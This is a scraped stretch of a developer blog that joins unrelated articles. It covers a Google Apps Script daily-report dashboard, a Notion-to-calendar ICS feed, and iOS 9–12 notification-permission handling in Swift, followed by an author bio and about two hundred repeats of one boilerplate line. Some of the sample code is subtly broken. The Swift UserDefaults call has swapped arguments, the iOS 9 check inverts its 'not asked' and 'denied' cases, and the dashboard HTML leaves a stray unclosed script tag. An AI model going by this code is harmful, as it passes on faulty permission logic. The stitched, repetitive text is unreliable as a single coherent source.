+
+function debug() {
+ cronjob();
+}
+
+function cronjob() {
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+
+ const gaData = new GAData(yesterday);
+ const inHouseReportData = fetchInHouseReportData(yesterday);
+
+ const report = new DailyReport(targetGoogleSheetID, yesterday, gaData, inHouseReportData);
+ report.execute();
+}
+
+function doGet(e) {
+ return HtmlService.createTemplateFromFile('Web_DailyReport_ Scaffolding').evaluate();
+}
+
+function getDailyReportBody() {
+ const html = HtmlService.createTemplateFromFile('Web_DailyReport_Body').evaluate().getContent();
+ return html;
+}
+
+// FOR POST
+// function doPost(e) {
+// ref: https://developers.google.com/apps-script/guides/web?hl=zh-tw
+// }
+
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
Add Web_DailyReport_ Scaffolding.html
Web Dashboard framework, since our war room screen needs to automatically update content, we create a Web skeleton that periodically fetches HTML content using Ajax:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+
<!DOCTYPE html>
+<html>
+ <head>
+ <base target="_top">
+ <script>
+ function onSuccess(html) {
+ if (html != null) {
+ var div = document.getElementById('result');
+ div.innerHTML = html;
+ }
+ }
+ setInterval(()=>{
+ google.script.run.withSuccessHandler(onSuccess).getDailyReportBody()
+ }, 1000 * 60 * 60 * 1);
+ google.script.run.withSuccessHandler(onSuccess).getDailyReportBody();
+ </script>
+ </head>
+ <body>
+ <div id="result">Loading...</div>
+ </body>
+</html>
+
New Web_DailyReport_Body.html
where the actual data is rendered into HTML:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+
<!DOCTYPE html>
+<html>
+ <head>
+ <base target="_top">
+ <style>
+ table {
+ border-collapse: collapse;
+ width: 100%;
+ text-align: center;
+ }
+ th, td {
+ border: 1px solid #000000;
+ padding: 8px;
+ text-align: center;
+ font-size: 36px;
+ }
+ </style>
+ </head>
+ <body>
+ <h1 style="text-align:center">ZHGCHG.LI</h1>
+ <table id="dataTable">
+ <tbody>
+ <?
+ // Display data from the past 7 days
+ const dashboard = new WebDailyReport(targetGoogleSheetID, 7);
+ // Starting from yesterday
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+ const data = dashboard.allData(yesterday);
+ for(const rowIndex in data) {
+ const row = data[rowIndex];
+ ?>
+ <tr>
+ <?
+ for(const columnIndex in row) {
+ const column = row[columnIndex];
+ ?>
+ <td style="background-color: <?=column["backgroundColor"]?>; color: <?=column["color"]?>; text-align: <?=column["horizontalAlignment"]?>;">
+ <?=column["value"]?>
+ </td>
+ <?
+ }
+ ?>
+ </tr>
+ <?
+ }
+ ?>
+ </tbody>
+ </table>
+ <script>
+ </body>
+</html>
+
Please note, we are fetching data from yesterday onwards for the past 7 days for comparison, today’s data will not be displayed.
The project directory after completing the above steps is as follows:
Test Deployment:
Click on the top right corner of the project “Deploy” -> “Test Deployment”
If stuck on Loading… or a server error occurs, you can go back to the “Executions” tab in the editor to check the error message:
Complete Final Deployment:
If the test is fine, you can complete the final deployment and release the URL.
Click on the top right corner of the project “Deploy” -> “New Deployment” -> Top left corner “Select type” -> “Web app”:
Code changes require redeployment to take effect:
Please note that when the code changes, you need to redeploy (the URL will not change) for the changes to take effect, otherwise, it will always be the old version.
Click on the top right corner of the project “Deploy” -> “Manage deployments”:
Click on the top right corner “Pen 🖊️ ICON” -> “Version” -> “Create new version” -> “Deploy”.
After deployment, click the URL, or go back to the original URL and refresh to see the new changes.
Final result:
(Modify the program to backfill this month’s data, otherwise, there will only be one entry for yesterday in the new data)
Previously implemented the Notion to Calendar functionality.
The implementation method is to connect to the Notion API to fetch Database data and apply it to generate an ICS format webpage, which is then deployed as a public webpage; this URL can be added to Apple Calendar.
Main.gs
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+
// Constant variables
+const notionToken = "XXXXX";
+const safeToken = "XXXXX";
+
+function doGet(e) {
+ const ics = HtmlService.createTemplateFromFile('ics');
+
+ if (e.parameter.token != safeToken) {
+ return ContentService.createTextOutput("Access Denied!");
+ }
+
+ ics.events = getQuickNote();
+
+ return ContentService.createTextOutput(ics.evaluate().getContent()).setMimeType(ContentService.MimeType.ICAL);
+}
+
+function debug() {
+ const ics = HtmlService.createTemplateFromFile('ics');
+ ics.events = getQuickNote();
+ Logger.log(ics.evaluate().getContent());
+}
+
+function getQuickNote() {
+ // YOUR FILTER Condition:
+ const payload = {
+ "filter": {
+ "and": [
+ {
+ "property": "Date",
+ "date": {
+ "is_not_empty": true
+ }
+ }
+ ,
+ {
+ "property": "Name",
+ "title": {
+ "is_not_empty": true
+ }
+ }
+ ]
+ }
+ };
+ const result = getDatabase(YOUR_DATABASE_ID, payload);
+ var events = [];
+ for (const index in result.results) {
+ const item = result.results[index]
+ const properties = item.properties;
+
+ const id = item['id'];
+ const create = toICSDate(item["created_time"]);
+ const edit = toICSDate(item["last_edited_time"]);
+ const startDate = properties['Date']['date']['start'];
+ const start = toICSDate(startDate);
+ var endDate = properties['Date']?.['date']?.['end'];
+ if (endDate == null) {
+ endDate = startDate;
+ }
+ const end = toICSDate(endDate);
+ const type = properties['Type']?.['multi_select']?.[0]?.['name'];
+
+ const title = "["+type+"] "+properties?.['Name']?.['title']?.[0]?.['plain_text'];
+ const description = item['url'];
+
+ events.push(
+ {
+ "id":id,
+ "create":create,
+ "edit":edit,
+ "start":start,
+ "end":end,
+ "title":title,
+ "description":description
+ }
+ )
+ }
+ return events;
+}
+// TO UTC Date
+function toICSDate(date) {
+ const icsDate = new Date(date);
+ icsDate.setHours(icsDate.getHours() - 8);
+ return Utilities.formatDate(icsDate, "GMT+8", "yyyyMMdd'T'HHmmss'Z'");// 20240304T132300Z
+}
+
+// Notion
+function getDatabase(id, payload) {
+ const url = 'https://api.notion.com/v1/databases/'+id+'/query/';
+ const options = {
+ method: 'post',
+ headers: {
+ 'Authorization': 'Bearer '+notionToken,
+ 'Content-Type': 'application/json',
+ 'Notion-Version': '2022-06-28'
+ },
+ payload: JSON.stringify(payload)
+ };
+ const result = UrlFetchApp.fetch(url, options);
+ return JSON.parse(result.getContentText());
+}
+
ics.html
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+
BEGIN:VCALENDAR
+PRODID:-//Google Inc//Google Calendar 70.9054//EN
+VERSION:2.0
+CALSCALE:GREGORIAN
+METHOD:PUBLISH
+X-WR-CALNAME:NotionCalendar
+X-WR-TIMEZONE:Asia/Taipei
+BEGIN:VTIMEZONE
+TZID:Asia/Taipei
+X-LIC-LOCATION:Asia/Taipei
+BEGIN:STANDARD
+TZOFFSETFROM:+0800
+TZOFFSETTO:+0800
+TZNAME:CST
+DTSTART:19700101T000000
+END:STANDARD
+END:VTIMEZONE
+<?
+ for(const eventIndex in events) {
+ const event = events[eventIndex];
+ ?>
+BEGIN:VEVENT
+DTSTART:<?=event["start"]?>
+
+DTEND:<?=event["end"]?>
+
+DTSTAMP:<?=event["edit"]?>
+
+UID:<?=event["id"]?>
+
+CREATED:<?=event["create"]?>
+
+LAST-MODIFIED:<?=event["edit"]?>
+
+SEQUENCE:0
+STATUS:CONFIRMED
+SUMMARY:<?=event["title"]?>
+
+DESCRIPTION:<?=event["description"]?>
+
+TRANSP:OPAQUE
+END:VEVENT
+<?
+ }
+?>
+END:VCALENDAR
+
As mentioned earlier, deploy as a web service, click on the top right corner of the project “Deploy” -> “New Deployment” -> top left corner “Select Type” -> “Web Application”:
Add the URL to the calendar subscription, and it’s done 🎉🎉🎉🎉 !
If you and your team have automation tool or process integration needs, whether it’s Slack App development, Notion, Asana, Google Sheet, Google Form, GA data, various integration needs, feel free to contact me for development.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Solution for handling notification permission status and requesting permissions from iOS 9 to iOS 12
Following the previous article “What? iOS 12 can send push notifications without user authorization (Swift)” which mentioned the optimization of the push notification permission acquisition process, after the optimization written in the previous Murmur part, new requirements were encountered:
Items 1 to 3 are fine, using the iOS 10 and later Framework UserNotifications can almost solve them properly. The troublesome part is item 4, which needs to support iOS 9. Handling iOS 9 using the old method registerUserNotificationSettings is not easy; let’s do it step by step!
First, declare a global notificationStatus object to store the notification permission status and add property monitoring to the pages that need to handle it (here I use Observable to subscribe to property changes, you can find suitable KVO or use Rx, ReactiveCocoa).
In appDelegate, handle the check of push notification permission status and change the value of notificationStatus in didFinishLaunchingWithOptions (when the app initially opens), applicationDidBecomeActive (when returning from the background state), and didRegisterUserNotificationSettings (≤iOS 9 push notification inquiry handling).
The pages that need to handle it will trigger and perform corresponding processing (e.g., pop up a notification closed prompt).
1
+2
+3
+4
+5
+6
+
enum NotificationStatusType {
+ case authorized
+ case denied
+ case notDetermined
+}
+var notificationStatus: Observable<NotificationStatusType?> = Observable(nil)
+
The four states of notificationStatus/NotificationStatusType correspond to:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
func checkNotificationPermissionStatus() {
+ if #available(iOS 10.0, *) {
+ UNUserNotificationCenter.current().getNotificationSettings { (settings) in
+ DispatchQueue.main.async {
+ // Note! Switch back to the main thread
+ if settings.authorizationStatus == .authorized {
+ // Allowed
+ notificationStatus.value = NotificationStatusType.authorized
+ } else if settings.authorizationStatus == .denied {
+ // Not allowed
+ notificationStatus.value = NotificationStatusType.denied
+ } else {
+ // Not asked
+ notificationStatus.value = NotificationStatusType.notDetermined
+ }
+ }
+ }
+ } else {
+ if UIApplication.shared.currentUserNotificationSettings?.types == [] {
+ if let iOS9NotificationIsDetermined = UserDefaults.standard.object(forKey: "iOS9NotificationIsDetermined") as? Bool, iOS9NotificationIsDetermined == true {
+ // Not asked
+ notificationStatus.value = NotificationStatusType.notDetermined
+ } else {
+ // Not allowed
+ notificationStatus.value = NotificationStatusType.denied
+ }
+ } else {
+ // Allowed
+ notificationStatus.value = NotificationStatusType.authorized
+ }
+ }
+}
+
That’s not all! Sharp-eyed friends should have noticed the custom UserDefaults “iOS9NotificationIsDetermined” in the ≤ iOS 9 judgment. What is it used for?
The main reason is that the method for detecting push notification permissions in ≤ iOS 9 can only use the current permissions as a judgment. If it is empty, it means no permission, but it will also be empty if the permission has not been asked. This is troublesome because it is unclear whether the user has never been asked or has denied the permission.
Here, I use a custom UserDefaults “iOS9NotificationIsDetermined” as a judgment switch and add it in the appDelegate’s didRegisterUserNotificationSettings:
1
+2
+3
+4
+5
+6
+
//appdelegate.swift:
+func application(_ application: UIApplication, didRegister notificationSettings: UIUserNotificationSettings) {
+ // For iOS 9 and below, this method is triggered after the permission prompt is shown and the user either allows or denies the notification.
+ UserDefaults.standard.set("iOS9NotificationIsDetermined", true)
+ checkNotificationPermissionStatus()
+}
+
After constructing the object and method for checking notification permission status, we need to add the following in appDelegate…
1
+2
+3
+4
+5
+6
+7
+8
+
//appdelegate.swift
+func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {
+ checkNotificationPermissionStatus()
+ return true
+}
+func applicationDidBecomeActive(_ application: UIApplication) {
+ checkNotificationPermissionStatus()
+}
+
The app needs to check the push notification status both at launch and when returning from the background.
This covers the detection part. Next, let’s see how to handle the request for notification permissions if it has not been asked.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
func requestNotificationPermission() {
+ if #available(iOS 10.0, *) {
+ let permissions: UNAuthorizationOptions = [.badge, .alert, .sound]
+ UNUserNotificationCenter.current().requestAuthorization(options: permissions) { (granted, error) in
+ DispatchQueue.main.async {
+ checkNotificationPermissionStatus()
+ }
+ }
+ } else {
+ application.registerUserNotificationSettings(UIUserNotificationSettings(types: [.alert, .badge, .sound], categories: nil))
+ // The didRegisterUserNotificationSettings in appdelegate.swift will handle the subsequent callback
+ }
+}
+
After handling detection and requests, let’s see how to apply it.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
if notificationStatus.value == NotificationStatusType.authorized {
+ // OK!
+} else if notificationStatus.value == NotificationStatusType.denied {
+ // Not allowed
+ // This example shows a UIAlertController prompt and redirects to the settings page upon clicking
+ let alertController = UIAlertController(
+ title: "Dear, you are currently unable to receive notifications",
+ message: "Please enable notification permissions for the app.",
+ preferredStyle: .alert)
+ let settingAction = UIAlertAction(
+ title: "Go to Settings",
+ style: .destructive,
+ handler: {
+ (action: UIAlertAction!) -> Void in
+ if let bundleID = Bundle.main.bundleIdentifier, let url = URL(string: UIApplicationOpenSettingsURLString + bundleID) {
+ UIApplication.shared.openURL(url)
+ }
+ })
+ let okAction = UIAlertAction(
+ title: "Cancel",
+ style: .default,
+ handler: {
+ (action: UIAlertAction!) -> Void in
+ // well....
+ })
+ alertController.addAction(okAction)
+ alertController.addAction(settingAction)
+ self.present(alertController, animated: true) {
+
+ }
+} else if notificationStatus.value == NotificationStatusType.notDetermined {
+ // Not asked
+ requestNotificationPermission()
+}
+
Note!! When jumping to the “Settings” page of the APP, do not use
UIApplication.shared.openURL(URL(string:”App-Prefs:root=\ (bundleID)”) )
method to jump, it will be rejected! It will be rejected! It will be rejected! (personal experience)
This is a Private API
For dynamically changing the status, since we use the Observable object for notificationStatus, we can add a listener in viewDidLoad where we need to monitor the status in real-time:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
override func viewDidLoad() {
+ super.viewDidLoad()
+ notificationStatus.afterChange += { oldStatus,newStatus in
+ if newStatus == NotificationStatusType.authorized {
+ //print("❤️Thank you for enabling notifications")
+ } else if newStatus == NotificationStatusType.denied {
+ //print("😭Oh no")
+ }
+ }
+}
+
The above is just sample code. You can adjust the actual application and triggers as needed.
*When using Observable for notificationStatus, please pay attention to memory management. It should be released when necessary (to prevent memory leaks) and retained when not (to avoid listener failure).
*Since our project supports iOS 9 to iOS 12, iOS 8 has not been tested and the support level is uncertain.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
1994, ♋️
From Changhua, Lives in Taipei / Taiwan 🇹🇼
One day you’ll leave this world behind, so live a life you will remember.
Travel, Biking, Running, Swimming, Hiking
ToDo
2022 Taipei Grand TrailToDo
2022 Free DivingBar, Izakaya
My Favorite Music Genres:
My Favorite Musician:
My Western Music Collection
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.
A new version of content is available.